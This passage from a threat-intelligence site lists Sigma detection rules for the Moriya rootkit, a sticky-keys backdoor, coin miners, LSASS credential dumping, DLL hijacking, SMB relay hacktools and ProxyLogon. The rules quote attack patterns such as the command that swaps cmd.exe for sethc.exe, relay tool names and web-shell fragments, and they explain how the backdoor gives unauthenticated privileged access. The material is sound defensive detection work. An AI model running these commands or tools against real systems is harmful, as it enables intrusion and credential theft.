            - '\winsession'  # Wild Neutron APT malware
            # - '\status_*' # CS default  https://github.com/SigmaHQ/sigma/issues/253
    condition: selection
falsepositives:
    - Unknown
level: critical
critical
Moriya Rootkit - System
Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report
status test author Bhabesh Raj id 25b9c01c-350d-4b95-bed1-836d04a4f324
view Sigma YAML 
title: Moriya Rootkit - System
id: 25b9c01c-350d-4b95-bed1-836d04a4f324
status: test
description: Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report
references:
    - https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831
author: Bhabesh Raj
date: 2021-05-06
modified: 2022-11-29
tags:
    - attack.persistence
    - attack.privilege-escalation
    - attack.t1543.003
logsource:
    product: windows
    service: system
detection:
    selection:
        Provider_Name: 'Service Control Manager'
        EventID: 7045
        ServiceName: ZzNetSvc
    condition: selection
falsepositives:
    - Unknown
level: critical
critical
Persistence Via Sticky Key Backdoor
By replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system. When the sticky keys are "activated" the privilleged shell is launched.
status test author Sreeman id 1070db9a-3e5d-412e-8e7b-7183b616e1b3
view Sigma YAML 
title: Persistence Via Sticky Key Backdoor
id: 1070db9a-3e5d-412e-8e7b-7183b616e1b3
status: test
description: |
    By replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system.
    When the sticky keys are "activated" the privilleged shell is launched.
references:
    - https://www.fireeye.com/blog/threat-research/2017/03/apt29_domain_frontin.html
    - https://www.clearskysec.com/wp-content/uploads/2020/02/ClearSky-Fox-Kitten-Campaign-v1.pdf
    - https://learn.microsoft.com/en-us/archive/blogs/jonathantrull/detecting-sticky-key-backdoors
author: Sreeman
date: 2020-02-18
modified: 2023-03-07
tags:
    - attack.persistence
    - attack.t1546.008
    - attack.privilege-escalation
logsource:
    product: windows
    category: process_creation
detection:
    selection:
        CommandLine|contains|all:
            - 'copy '
            - '/y '
            - 'C:\windows\system32\cmd.exe C:\windows\system32\sethc.exe'
    condition: selection
falsepositives:
    - Unlikely
level: critical
critical
Possible Coin Miner CPU Priority Param
Detects command line parameter very often used with coin miners
status test author Florian Roth (Nextron Systems) id 071d5e5a-9cef-47ec-bc4e-a42e34d8d0ed
view Sigma YAML 
title: Possible Coin Miner CPU Priority Param
id: 071d5e5a-9cef-47ec-bc4e-a42e34d8d0ed
status: test
description: Detects command line parameter very often used with coin miners
references:
    - https://xmrig.com/docs/miner/command-line-options
author: Florian Roth (Nextron Systems)
date: 2021-10-09
modified: 2022-12-25
tags:
    - attack.privilege-escalation
    - attack.t1068
logsource:
    product: linux
    service: auditd
detection:
    cmd1:
        a1|startswith: '--cpu-priority'
    cmd2:
        a2|startswith: '--cpu-priority'
    cmd3:
        a3|startswith: '--cpu-priority'
    cmd4:
        a4|startswith: '--cpu-priority'
    cmd5:
        a5|startswith: '--cpu-priority'
    cmd6:
        a6|startswith: '--cpu-priority'
    cmd7:
        a7|startswith: '--cpu-priority'
    condition: 1 of cmd*
falsepositives:
    - Other tools that use a --cpu-priority flag
level: critical
critical
Potential Credential Dumping Via LSASS Process Clone
Detects a suspicious LSASS process process clone that could be a sign of credential dumping activity
status test author Florian Roth (Nextron Systems), Samir Bousseaden id c8da0dfd-4ed0-4b68-962d-13c9c884384e
view Sigma YAML 
title: Potential Credential Dumping Via LSASS Process Clone
id: c8da0dfd-4ed0-4b68-962d-13c9c884384e
status: test
description: Detects a suspicious LSASS process process clone that could be a sign of credential dumping activity
references:
    - https://www.matteomalvica.com/blog/2019/12/02/win-defender-atp-cred-bypass/
    - https://twitter.com/Hexacorn/status/1420053502554951689
    - https://twitter.com/SBousseaden/status/1464566846594691073?s=20
author: Florian Roth (Nextron Systems), Samir Bousseaden
date: 2021-11-27
modified: 2023-03-02
tags:
    - attack.credential-access
    - attack.t1003
    - attack.t1003.001
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: '\Windows\System32\lsass.exe'
        Image|endswith: '\Windows\System32\lsass.exe'
    condition: selection
falsepositives:
    - Unknown
level: critical
critical
Potential Credential Dumping Via LSASS SilentProcessExit Technique
Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process
status test author Florian Roth (Nextron Systems) id 55e29995-75e7-451a-bef0-6225e2f13597
view Sigma YAML 
title: Potential Credential Dumping Via LSASS SilentProcessExit Technique
id: 55e29995-75e7-451a-bef0-6225e2f13597
related:
    - id: 36803969-5421-41ec-b92f-8500f79c23b0
      type: similar
status: test
description: Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process
references:
    - https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/
    - https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/
author: Florian Roth (Nextron Systems)
date: 2021-02-26
modified: 2022-12-19
tags:
    - attack.credential-access
    - attack.t1003.001
logsource:
    category: registry_event
    product: windows
detection:
    selection:
        TargetObject|contains: 'Microsoft\Windows NT\CurrentVersion\SilentProcessExit\lsass.exe'
    condition: selection
falsepositives:
    - Unlikely
level: critical
critical
Potential DCOM InternetExplorer.Application DLL Hijack
Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class over the network
status test author Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga id 2f7979ae-f82b-45af-ac1d-2b10e93b0baa
view Sigma YAML 
title: Potential DCOM InternetExplorer.Application DLL Hijack
id: 2f7979ae-f82b-45af-ac1d-2b10e93b0baa
related:
    - id: e554f142-5cf3-4e55-ace9-a1b59e0def65
      type: obsolete
    - id: f354eba5-623b-450f-b073-0b5b2773b6aa
      type: similar
status: test
description: Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class over the network
references:
    - https://threathunterplaybook.com/hunts/windows/201009-RemoteDCOMIErtUtilDLLHijack/notebook.html
author: Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga
date: 2020-10-12
modified: 2022-12-18
tags:
    - attack.lateral-movement
    - attack.t1021.002
    - attack.t1021.003
logsource:
    product: windows
    category: file_event
detection:
    selection:
        Image: System
        TargetFilename|endswith: '\Internet Explorer\iertutil.dll'
    condition: selection
falsepositives:
    - Unknown
level: critical
critical
Potential DCOM InternetExplorer.Application DLL Hijack - Image Load
Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class
status test author Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga id f354eba5-623b-450f-b073-0b5b2773b6aa
view Sigma YAML 
title: Potential DCOM InternetExplorer.Application DLL Hijack - Image Load
id: f354eba5-623b-450f-b073-0b5b2773b6aa
related:
    - id: e554f142-5cf3-4e55-ace9-a1b59e0def65
      type: obsolete
    - id: 2f7979ae-f82b-45af-ac1d-2b10e93b0baa
      type: similar
status: test
description: Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class
references:
    - https://threathunterplaybook.com/hunts/windows/201009-RemoteDCOMIErtUtilDLLHijack/notebook.html
author: Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga
date: 2020-10-12
modified: 2022-12-18
tags:
    - attack.lateral-movement
    - attack.t1021.002
    - attack.t1021.003
logsource:
    product: windows
    category: image_load
detection:
    selection:
        Image|endswith: '\Internet Explorer\iexplore.exe'
        ImageLoaded|endswith: '\Internet Explorer\iertutil.dll'
    condition: selection
falsepositives:
    - Unknown
level: critical
critical
Potential SMB Relay Attack Tool Execution
Detects different hacktools used for relay attacks on Windows for privilege escalation
status test author Florian Roth (Nextron Systems) id 5589ab4f-a767-433c-961d-c91f3f704db1
view Sigma YAML 
title: Potential SMB Relay Attack Tool Execution
id: 5589ab4f-a767-433c-961d-c91f3f704db1
status: test
description: Detects different hacktools used for relay attacks on Windows for privilege escalation
references:
    - https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/
    - https://pentestlab.blog/2017/04/13/hot-potato/
    - https://github.com/ohpe/juicy-potato
    - https://hunter2.gitbook.io/darthsidious/other/war-stories/domain-admin-in-30-minutes
    - https://hunter2.gitbook.io/darthsidious/execution/responder-with-ntlm-relay-and-empire
    - https://www.localpotato.com/
author: Florian Roth (Nextron Systems)
date: 2021-07-24
modified: 2023-02-14
tags:
    - attack.collection
    - attack.execution
    - attack.credential-access
    - attack.t1557.001
logsource:
    category: process_creation
    product: windows
detection:
    selection_pe:
        Image|contains:
            - 'PetitPotam'
            - 'RottenPotato'
            - 'HotPotato'
            - 'JuicyPotato'
            - '\just_dce_'
            - 'Juicy Potato'
            - '\temp\rot.exe'
            - '\Potato.exe'
            - '\SpoolSample.exe'
            - '\Responder.exe'
            - '\smbrelayx'
            - '\ntlmrelayx'
            - '\LocalPotato'
    selection_script:
        CommandLine|contains:
            - 'Invoke-Tater'
            - ' smbrelay'
            - ' ntlmrelay'
            - 'cme smb '
            - ' /ntlm:NTLMhash '
            - 'Invoke-PetitPotam'
            - '.exe -t * -p '  # JuicyPotatoNG pattern https://github.com/antonioCoco/JuicyPotatoNG
    selection_juicypotato_enum:  # appears when JuicyPotatoNG is used with -b
        CommandLine|contains: '.exe -c "{'
        CommandLine|endswith: '}" -z'
    filter_hotpotatoes:  # known goodware https://hotpot.uvic.ca/
        Image|contains:
            - 'HotPotatoes6'
            - 'HotPotatoes7'
            - 'HotPotatoes ' # Covers the following: 'HotPotatoes 6', 'HotPotatoes 7', 'HotPotatoes Help', 'HotPotatoes Tutorial'
    condition: 1 of selection_* and not 1 of filter_*
falsepositives:
    - Legitimate files with these rare hacktool names
level: critical
critical
ProxyLogon MSExchange OabVirtualDirectory
Detects specific patterns found after a successful ProxyLogon exploitation in relation to a Commandlet invocation of Set-OabVirtualDirectory
status test author Florian Roth (Nextron Systems) id 550d3350-bb8a-4ff3-9533-2ba533f4a1c0
view Sigma YAML 
title: ProxyLogon MSExchange OabVirtualDirectory
id: 550d3350-bb8a-4ff3-9533-2ba533f4a1c0
status: test
description: Detects specific patterns found after a successful ProxyLogon exploitation in relation to a Commandlet invocation of Set-OabVirtualDirectory
references:
    - https://bi-zone.medium.com/hunting-down-ms-exchange-attacks-part-1-proxylogon-cve-2021-26855-26858-27065-26857-6e885c5f197c
author: Florian Roth (Nextron Systems)
date: 2021-08-09
modified: 2023-01-23
tags:
    - attack.t1587.001
    - attack.resource-development
logsource:
    product: windows
    service: msexchange-management
detection:
    keywords_cmdlet:
        '|all':
            - 'OabVirtualDirectory'
            - ' -ExternalUrl '
    keywords_params:
        - 'eval(request'
        - 'http://f/<script'
        - '"unsafe"};'
        - 'function Page_Load()'
    condition: keywords_cmdlet and keywords_params
falsepositives:
    - Unlikely
level: critical
Showing 1-50 of 3,132
Prev 1 Next
Vulnerabilities
CISA KEV catalog
CWE weaknesses
CAPEC attack patterns
Package vulnerabilities
Threat intelligence
Threat actors
Tools & malware
ATT&CK techniques
IOCs
Detection & defense
Sigma rules
YARA rules
Atomic Red Team tests
D3FEND countermeasures
Compliance
NIST 800-53
ISO 27001:2022
SOC 2 TSC
PCI-DSS v4.0
CIS Controls v8.1
About
All capabilities
Live statistics
Data sources
Privacy policy
Terms of service
threatengine.sh  ·  Open-source threat intelligence platform  ·  100+ authoritative sources  ·  Every fact traces to its origin